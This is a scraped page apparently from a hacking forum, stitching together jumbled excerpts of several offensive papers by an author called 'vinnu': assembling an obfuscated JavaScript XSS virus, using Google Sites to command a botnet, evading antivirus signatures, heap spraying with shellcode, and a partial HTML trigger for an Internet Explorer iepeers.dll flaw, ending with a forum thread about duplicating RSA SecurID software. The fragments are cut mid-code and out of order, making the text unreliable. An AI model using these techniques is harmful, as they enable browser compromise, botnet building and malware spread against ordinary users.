Now I just need to scramble the code. For this purpose I created a HTML file containing the code and encoder and decoder. This file will assemble the virus and will provide us the viral code. The HTML code is:
<html>
<head><title>Ashi assmebler by "vinnu"</title>
<script language=javascript>
var ashi='trigger();function trigger(){var
vin=document.getElementsByTagName(\"a\");var total=0;var index=0;var
address;for(var
This is a google's free page uploading facility (http://sites.google.com/site). I loaded the .js file as an attatchment. But it contained nothing initially.It was meant for controlling the Botnet and commanding it later in forming the XSS tunnels. It was the second stage of two staged botnet formation.Note: The third party free sites are also useful to connect to a botnet if you do not have any dedicated server. In ur script file at free site like google,you can place a script that can redirect
Evading AV Signatures..Derailing the Antivirus
Author: "vinnu"
Greetz : Prashant Uniyal, b0nd, Lord Deathstorm, D4rk357, G4H
Team : Legion Of Xtremers (LOX).
The perimeter defence (antivirus) is still considered fullproof measure by most of people
in virtual world. Such an assumption is fatal and can lead to more sophisticated compromise
of systems.
Note: In my last paper, "Heap spray -- Slipping CPU
Above exploit will take nearly a minute to spraY the heap. Also study the performance graph of memory and cpu in taskmanager for
better understanding the heap spray technique.
2. IE iepeers:
The following code can trigger the vulnerability in ieepeers.dll in internet explorer:
<html><body>
<button id='butid' onclick='trigger();' style='display:none'></button>
<!--place the sprayer
Heap Spray --- Slipping CPU to our pocket
Author : "vinnu"
Team : "Legion Of Xtremers" (LOXians)
Greetz : Prashant Uniyal, b0nd, D4rk357, skylined
Rootkit Information:
IDE: any text editor
Language : Javascript
Targets: Web browsers
As the name defines itself Heap Spray technique uses the spraying of heap memory
with injection vector.
Injection Vector: Nop sled + Shellcode
Forum Threads
Home Page
Find latest posts
View Articles
View Blog Entries
Likes Received (26)
Duplicate RSA SeureID software...
Today, 10:15 AM in Reverse Engineering and Application Cracking